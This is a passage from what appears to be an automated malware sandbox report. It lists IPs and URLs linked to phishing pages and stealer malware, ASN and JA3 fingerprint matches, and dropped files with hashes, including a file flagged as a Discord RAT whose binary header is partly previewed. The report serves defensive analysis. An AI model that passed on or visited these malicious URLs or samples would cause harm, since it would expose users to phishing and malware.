                                                                                                                            SetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.128.233
                                                                                                                            SetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.128.233
                                                                                                                            KzqQe0QtRd.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            PAP46E1UkZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.128.233
                                                                                                                            A4AxThCBqS.exeGet hashmaliciousNanocore, Luna Logger, Umbral StealerBrowse
                                                                                                                            • 162.159.136.232
                                                                                                                            windowsupdatebg.s.llnwi.nethttps://maliyedavasorgu.org/sorguGet hashmaliciousUnknownBrowse
                                                                                                                            • 87.248.205.0
                                                                                                                            http://www.nftexpodubai.com/fwyttw/wp.phpGet hashmaliciousUnknownBrowse
                                                                                                                            • 87.248.204.0
                                                                                                                            http://www.grandsignatureyercaud.com/Get hashmaliciousUnknownBrowse
                                                                                                                            • 87.248.204.0
                                                                                                                            http://www.nesianlife.com/Get hashmaliciousUnknownBrowse
                                                                                                                            • 87.248.205.0
                                                                                                                            https://www.cpmrevenuegate.com/n6zwydwb?key=61b0420b9b99c2ec074ef98b4030ef8cGet hashmaliciousAnonymous ProxyBrowse
                                                                                                                            • 87.248.204.0
                                                                                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                            • 178.79.238.0
                                                                                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                            • 87.248.204.0
                                                                                                                            f2e7fcb20146.exeGet hashmaliciousStealcBrowse
                                                                                                                            • 87.248.204.0
                                                                                                                            https://new-doctor-booking-php-mysql.filemakrxpert.com/Get hashmaliciousUnknownBrowse
                                                                                                                            • 87.248.204.0
                                                                                                                            https://www.thefirsthbcu.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 178.79.208.1

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            CLOUDFLARENETUShttp://pub-840f88e3288a4f17b5efba5dbcc493d8.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            https://pub-e3974f4c00f54fc28eadd63f1eacad4a.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            http://pub-0c062afe82544962aee957f640f2ca2d.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            https://pub-903cd42f250e4526ad35bcac86048a96.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            http://pub-6906da2464104cdc84bd9a9fa52dde76.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            https://pub-8d80ac938c6b433695a7e0831c963d56.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 172.66.0.235
                                                                                                                            http://pub-30984890657744baad27fb8faa5b5cc9.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            https://zhongwen-telegram.com/web/Get hashmaliciousUnknownBrowse
                                                                                                                            • 104.22.11.112
                                                                                                                            https://maliyedavasorgu.org/sorguGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            https://token-portaldapp.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 172.66.44.75
                                                                                                                            CLOUDFLARENETUShttp://pub-840f88e3288a4f17b5efba5dbcc493d8.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            https://pub-e3974f4c00f54fc28eadd63f1eacad4a.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            http://pub-0c062afe82544962aee957f640f2ca2d.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            https://pub-903cd42f250e4526ad35bcac86048a96.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            http://pub-6906da2464104cdc84bd9a9fa52dde76.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            https://pub-8d80ac938c6b433695a7e0831c963d56.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 172.66.0.235
                                                                                                                            http://pub-30984890657744baad27fb8faa5b5cc9.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            https://zhongwen-telegram.com/web/Get hashmaliciousUnknownBrowse
                                                                                                                            • 104.22.11.112
                                                                                                                            https://maliyedavasorgu.org/sorguGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            https://token-portaldapp.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 172.66.44.75
                                                                                                                            FASTLYUShttp://pub-840f88e3288a4f17b5efba5dbcc493d8.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 185.199.108.153
                                                                                                                            https://pub-e3974f4c00f54fc28eadd63f1eacad4a.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 185.199.108.153
                                                                                                                            http://pub-0c062afe82544962aee957f640f2ca2d.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 151.101.194.137
                                                                                                                            https://pub-903cd42f250e4526ad35bcac86048a96.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 185.199.110.153
                                                                                                                            http://pub-6906da2464104cdc84bd9a9fa52dde76.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 185.199.110.153
                                                                                                                            https://pub-8d80ac938c6b433695a7e0831c963d56.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 185.199.110.153
                                                                                                                            http://pub-30984890657744baad27fb8faa5b5cc9.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 151.101.2.137
                                                                                                                            https://free-5464198.webadorsite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 151.101.1.46
                                                                                                                            http://sneamcomnnumnlty.com/fact/actual/getGet hashmaliciousUnknownBrowse
                                                                                                                            • 151.101.65.229
                                                                                                                            http://pan4477.onrender.com/Get hashmaliciousUnknownBrowse
                                                                                                                            • 151.101.194.137

                                                                                                                            JA3 Fingerprints

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            74954a0c86284d0d6e1c4efefe92b521S4dd5N5VuJ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            • 162.159.128.233
                                                                                                                            404.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            • 162.159.128.233
                                                                                                                            D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            • 162.159.128.233
                                                                                                                            c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            • 162.159.128.233
                                                                                                                            404.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            • 162.159.128.233
                                                                                                                            s14.batGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            • 162.159.128.233
                                                                                                                            s200.batGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            • 162.159.128.233
                                                                                                                            KYwOaWhyl6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            • 162.159.128.233
                                                                                                                            HdXeCzyZD9.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            • 162.159.128.233
                                                                                                                            NCTSgL4t0B.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            • 162.159.128.233
                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0ehttps://pub-e3974f4c00f54fc28eadd63f1eacad4a.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 185.199.108.153
                                                                                                                            • 162.159.128.233
                                                                                                                            http://pub-6906da2464104cdc84bd9a9fa52dde76.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 185.199.108.153
                                                                                                                            • 162.159.128.233
                                                                                                                            https://free-5464198.webadorsite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 185.199.108.153
                                                                                                                            • 162.159.128.233
                                                                                                                            http://distrosourcess8.sg-host.com/Get hashmaliciousUnknownBrowse
                                                                                                                            • 185.199.108.153
                                                                                                                            • 162.159.128.233
                                                                                                                            https://token-portaldapp.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 185.199.108.153
                                                                                                                            • 162.159.128.233
                                                                                                                            http://peru-spost.shop/Get hashmaliciousUnknownBrowse
                                                                                                                            • 185.199.108.153
                                                                                                                            • 162.159.128.233
                                                                                                                            http://pan4477.onrender.com/Get hashmaliciousUnknownBrowse
                                                                                                                            • 185.199.108.153
                                                                                                                            • 162.159.128.233
                                                                                                                            http://485089-coinbase.com/Get hashmaliciousUnknownBrowse
                                                                                                                            • 185.199.108.153
                                                                                                                            • 162.159.128.233
                                                                                                                            Booking_0106.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 185.199.108.153
                                                                                                                            • 162.159.128.233
                                                                                                                            https://daf2019.com/8/02Get hashmaliciousUnknownBrowse
                                                                                                                            • 185.199.108.153
                                                                                                                            • 162.159.128.233

                                                                                                                            Dropped Files

                                                                                                                            No context

                                                                                                                            Created / dropped Files

                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1310720
                                                                                                                            Entropy (8bit):0.80220226784722
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAy:RJE+Lfki1GjHwU/+vVhWqp7
                                                                                                                            MD5:A089EB9D32487104027FABFD04A8400A
                                                                                                                            SHA1:ED1197C5057D6C93BECBBB19DAD7BDEB419FEB42
                                                                                                                            SHA-256:AFA58CB6EB11E114A49FE8C5E122BA9D70EBF1B2ED46970C054BF1BD6F1C13F6
                                                                                                                            SHA-512:CFCB8B544EB78611438FD2265057A5B2C26626319F260B09D53817002614AEECEA8CAB87406FEF71487FB2BCE77D8DCDB31146FF7DAE16ADDD23D7C5E6E73D0A
                                                                                                                            Malicious:false
                                                                                                                            Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6115e02f, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1048576
                                                                                                                            Entropy (8bit):0.9433522114881583
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:rSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:razaHvxXy2V2UR
                                                                                                                            MD5:0C71F527FFFE04EC8B31082859BF8CDB
                                                                                                                            SHA1:29213069528F2D7C8500DC8036D85988167FFDFC
                                                                                                                            SHA-256:FFC5A1DC20D29D1BF10E78E6FED90882D6B85895CDD2F4933A54B76DA7DC5A67
                                                                                                                            SHA-512:F7A9DCA0D97ABFFFCFB216A18B3E5C537A2C325E1E23CC517786F3698C61FD7DC2435E29F4E047914733B630FC20E1867F091CE4D9979DFF7F08A78D2E66376F
                                                                                                                            Malicious:false
                                                                                                                            Preview:a../... ...............X\...;...{......................0.x...... ...{s..%...|..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{....................................c.%...|q..................e...%...|3..........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):16384
                                                                                                                            Entropy (8bit):0.08161364465695778
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Qfz/lKYeJXnll/nqlFcl1ZUllllx9VlAllGBnX/l/Tj/k7/t:Q7/lKzJXnll/qlFclQ/lNPA254
                                                                                                                            MD5:03068336943704492815C9785D1AC289
                                                                                                                            SHA1:6AF5EAC543DAA7FD10F93573F374E2EB6A742E34
                                                                                                                            SHA-256:8093AEEF1F6987D60CCE2C4DB75DB863BD638C95346D42FE350F41B3494F88A7
                                                                                                                            SHA-512:582EAF01E4BDB4D7FC062C073CFB18D62805F6D688756E6EEB1D9EB1996C21570DBA287C2A310AB17A849F8F6ECD17F5BC8623820C47C777EAE91E21C2204CE1
                                                                                                                            Malicious:false
                                                                                                                            Preview:.6.M.....................................;...{...%...|3.. ...{s.......... ...{s.. ...{s.P.... ...{s..................e...%...|3.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Users\Public\Documents\Secret Document\exe.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):80384
                                                                                                                            Entropy (8bit):5.482297427900561
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:52WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+6PIC:5Zv5PDwbjNrmAE+mIC
                                                                                                                            MD5:BB4F0729F484BC823BDC393F2FD4B723
                                                                                                                            SHA1:E7F63627162230106FB2F19C4F349A833CC71CAE
                                                                                                                            SHA-256:DC89E0477362F409D4AD88D010D093B755F4B5224847B7D4D52C570AA60F664D
                                                                                                                            SHA-512:E58246F48DCB269838722D182B0E0AB546EE4C92DD8668D10D77EFF70B4C4552E9EFAB8DDFD424319B9CFC84FAB08C709F6F7E5AD038AC019C7ABEDA76B9B946
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_DiscordRat, Description: Yara detected Discord Rat, Source: C:\Users\Public\Documents\Secret Document\exe.exe, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..2............... .....@..... ....................................`...@......@............... ...............................`............................................................................................... ..H............text...80... ...2.................. ..`.rsrc........`.......4..............@..@........................................H...........x.......".....................................................{....*"..}....*2.(....o....*J. . ..}.....(....*6.|.....("...*6.|.....("...*6.|.....("...*..(....*^.{....{.....{....o7...*6.|.....("...*6.|.....("...*2.( ...(....*F~&....( ...o...+*2~&....o...+*2~&....oM...*2(I....oJ...*.~_...r...p.oe...r...p(f...og...(h...(i...(f...og...ob...*.~u...r...po`...%(v.....R....ow...oc...*.~u...r...po`...%(v.....ow...oc...*6.|2....("...*6.|6....("...*6.|9....("...*6.|=....("...*6.|A..

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000011.db

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):107416
                                                                                                                            Entropy (8bit):4.001038701520514
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:Ol8dkJGMQqXWRjk0QsVWoh3NBLxKNCjBlzTPieb6PR1vPipaJd5m5oypQqW3/gLD:jkxQqwVWohRqeJLhOihGxnl9EFO7K2I
                                                                                                                            MD5:CC7F4C9126079B1E1A9166DBBE4A98F2
                                                                                                                            SHA1:B66CCFDE8AC4EBB4A93977D5E63A5B006CA76289
                                                                                                                            SHA-256:F0B9173C390FD7BC6109C59496BF82570A54FCFE0D6A4D5BA04F9A263E7E1F70
                                                                                                                            SHA-512:7000B242736FA3C5EAFC991399817B52F1C6CC237741B58FDF38A88AB418943BFFB2389BDBE5AC0CA6B29CBC7DC0CDBED301C9192B931F643ABA52167677A414
                                                                                                                            Malicious:false
                                                                                                                            Preview:....h... .......`.......P...........`...X.......]...................8...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................h.u.b.e.r.t.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):107416
                                                                                                                            Entropy (8bit):4.001352432292237
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:tl8fkpGMQqXWRjk0QsVWoh3NBLxKNCjBlzTPieb6PR1vPipaJd5m5oypQqW3/gLB:AkRQqwVWohRqeJLhOihGxnl9EFO7K26
                                                                                                                            MD5:302F9192B4222D8EEA1C10BA62869761
                                                                                                                            SHA1:ECDA95BF2C0D69BBC30785BB3D5353F79653297B
                                                                                                                            SHA-256:5A43F0FF8986CD6363D0E2E117C9F55B5205239690673C80A3009A2DD92A2E9A
                                                                                                                            SHA-512:D6AB18B09CF79F49186D1C66AD032943B97FCFC6EE4AA14B220AE00051EC8527AC94FDD72615C273501E9E05744AA00507C16944F7D33DB001C8C01EF80B94E3
                                                                                                                            Malicious:false
                                                                                                                            Preview:....h... .......`.......P...........`...X.......]...................8...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................h.u.b.e.r.t.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Windows[2].json

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:JSON data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):750
                                                                                                                            Entropy (8bit):5.169088473097709
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:YWgc2X6AvH+SA33kxmwzkH+2yrZMAdrKC8K/y8kEhq1HLxycXNNZ/TCB893c3Z:Yzc2zHokx4Ht0drc6hE14
                                                                                                                            MD5:DB2518E20EA958BB9EA0FC4224E07DFC
                                                                                                                            SHA1:9994E6F0C9BF99F98EB84EB3F95FE44C738B12C1
                                                                                                                            SHA-256:98E8099209115248A4E77353F3B006B0DC2D681F699D87C643FA2C8E4F8A6802
                                                                                                                            SHA-512:5BAB64431C6A5D16744EF6CAE18E3EC448A68C0A62FA9C30EC16493D230EC9EFD0FE71B45DA4B8F3986DB2FAD7E183712DB947AC1526AAB7DFDA33D052D0989E
                                                                                                                            Malicious:false
                                                                                                                            Preview:{"serviceContext":{"serviceActivityId":"28cb9461-803b-4878-8615-f81aed294a05","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"28cb9461-803b-4878-8615-f81aed294a05|2024-10-06T11:37:32.5539259Z|fabric_msn|EUS2-A|News_661"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false},"isPartial":false}

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):1520
                                                                                                                            Entropy (8bit):5.627334012854225
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:3USKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKCUIr6hSi9xY+jlmVy95p:kSU4y4RQmFoUeCamfm9qr9tK8NLUISPr
                                                                                                                            MD5:468277DD9B48774B0ADD6570AAE8A5D7
                                                                                                                            SHA1:0CA81C5E99554382741FBA631572EF1B50B19AF7
                                                                                                                            SHA-256:12827ADC1DC0581E4F29D81FFD487E20059ED7CB0C834B8912FCAABE2A8C66A9
                                                                                                                            SHA-512:74E98EBBC5445E19103540F29E24B4676D917CA1EEB291A1525ECB4EB2394592CDE4346B32A4390B189672A6C744106C18D0668C8A19672D8354B61FF2325BFC
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e...........Q...............................................@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                                                            C:\Users\user\AppData\Local\Temp\RES33AA.tmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Sun Oct 6 13:05:39 2024, 1st section name ".debug$S"
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1336
                                                                                                                            Entropy (8bit):4.009164548872662
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:Hnm9IuZQQNL0iHhwKRmNII+ycuZhN/akSRPNnqSSd:DuCQNHqKRmu1ul/a3jqSC
                                                                                                                            MD5:31AEB34D231C51EADA82F29191E1B17D
                                                                                                                            SHA1:AE44A636D4FB35737E7160B3015C18F0E3D9DF31
                                                                                                                            SHA-256:995F6A0F6A8945DEA56DEC833082F6D91C16BFA2D5779836BF99FB90CA46E649
                                                                                                                            SHA-512:1FF82A9DDB83F10EAF4A6D0F24E7CBBE7F0B7A516BBD3FF72FB04EB397D80EDC930E6608D729763BB9CFF00EE2E13EE0F9BB4C4BCB82528518FB5C36AC76089A
                                                                                                                            Malicious:false
                                                                                                                            Preview:L...#..g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\l1mwkpcb\CSC55DD152A8365426E9AFFE8E8746FD1A1.TMP...................+P./#.C.z.............5.......C:\Users\user\AppData\Local\Temp\RES33AA.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.1.m.w.k.p.c.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0pqpnc00.dqv.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1o2aa4yt.nae.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xgrkjgg.v3o.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aamc33ci.q4l.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
